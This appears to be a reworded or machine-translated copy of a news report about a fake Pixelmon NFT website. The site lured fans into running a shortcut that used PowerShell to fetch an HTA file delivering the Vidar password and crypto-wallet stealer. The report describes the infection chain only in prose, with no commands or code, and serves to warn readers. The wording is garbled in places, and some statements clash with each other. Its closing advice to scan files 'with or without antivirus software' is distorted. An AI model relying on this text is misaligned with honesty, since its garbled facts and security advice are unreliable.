The fake Pixelmon NFT site attracts fans with free tokens and collectibles while infecting cryptocurrency wallet-stealing malware.
Pixelmon Popular NFT project Its roadmap includes creating an online Metaverse game where you can use Pixel Monpet to gather, train and fight other players.
With nearly 200,000 Twitter followers and over 25,000 Discord members, the project has received a lot of attention.
Impersonate a Pixelmon project
To take advantage of this interest, the threat actor copied the legitimate pixelmon.club website and created a fake version with pixelmon.[.]Pw for distributing malware.
This site is almost a replica of the legitimate site, but the malicious site provides an executable file that installs password-stealing malware on the device instead of providing a demo of the project’s game.
This site provides a file called Installer.zip that contains executable files that appear to be corrupted and do not infect users with malware.
However, MalwareHunterTeam, First discovered This malicious site has made it possible to find other malicious files distributed by the site and see which malware is spreading.
One of the files distributed by this malicious site is setup.zip, which contains the setup.lnk file. Setup.lnk is a Windows shortcut that runs a PowerShell command to download the system32.hta file from pixelmon.[.]pw.
When Bleeping Computer tested these malicious payloads, the System32.hta file downloaded Vidar. This is password-stealing malware that is not as commonly used as it used to be.This has been confirmed by security researchers Fumik0_I have analyzed this malware family before.
When executed, the attacker’s Vidar sample connects to the Telegram channel and obtains the IP address of the malware’s command and control server.
The malware then gets a configuration command from C2 and downloads more modules used to steal data from the infected device.
Vidar malware can steal passwords from browsers and applications, search your computer for a file that matches a particular name, and upload that file to an attacker.
As you can see from the malware configuration below, C2 tells the malware to search for and steal various files such as text files, cryptocurrency wallets, backups, codes, password files, and authentication files.
Since this is an NFT site, visitors are expected to install a cryptocurrency wallet on their computer. For this reason, threat actors emphasize finding and plagiarizing files related to cryptocurrencies.
The site is not currently distributing a working payload, but Bleeping Computer has confirmed evidence that threat actors have been changing the site for the past few days as the payload that was available two days ago is no longer available. ..
Due to the activity on the site, this campaign will continue to be active and it is expected that functional threats will be added soon.
NFT projects are overwhelmed by scams designed to steal cryptocurrencies, so you should always make sure that the URL you are visiting is actually related to the project you are interested in.
In addition, do not run executables from unknown websites without first scanning with or without antivirus software. VirusTotal..